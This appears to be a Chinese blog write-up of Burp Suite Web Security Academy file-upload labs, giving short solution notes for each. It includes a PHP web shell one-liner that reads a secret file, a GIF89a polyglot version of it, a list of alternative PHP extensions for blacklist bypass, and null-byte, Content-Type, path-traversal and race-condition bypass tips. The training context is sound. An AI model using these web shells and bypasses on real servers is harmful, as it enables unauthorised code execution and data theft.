Burpsuite靶场---文件上传漏洞专题

文件上传漏洞专题

Lab: Remote code execution via web shell upload

没什么好说的,没有任何过滤,直接读

<?php var_dump(file_get_contents('/home/carlos/secret'));?>

Lab: Web shell upload via Content-Type restriction bypass

这个也是改下Content-Type就好了

Lab: Web shell upload via path traversal

这个并不限制我们传入php文件,但是会把我们传入的可执行代码变成文本,但是这里有个文件上传的利用点

这样我们是可以在上一级目录里去执行任意代码

Lab: Web shell upload via extension blacklist bypass

考一些不常见扩展名绕过

.phtml .PHp pht, phpt, phtml, php3,php4,php5,php6

Lab: Web shell upload via obfuscated file extension

混淆文件名绕过,依然是bypass,这里我直接用00截断绕过了

Lab: Remote code execution via polyglot web shell upload

有些不判断后缀,判断文件内容是否符合预期

可以改文件头绕过

GIF89a
<?php var_dump(file_get_contents('/home/carlos/secret'));?>

Lab: Web shell upload via race condition

条件竞争,but,一定一定要记得最后GET请求要多一个换行,不然怎么也跑不出来

社区解答

Burpsuite靶场---文件上传漏洞专题

https://lhxhl.github.io/2022/03/12/burp_file_upload/

作者

秋秋晚

发布于

2022-03-12

更新于

2023-01-10

许可协议

评论

:D 一言句子获取中...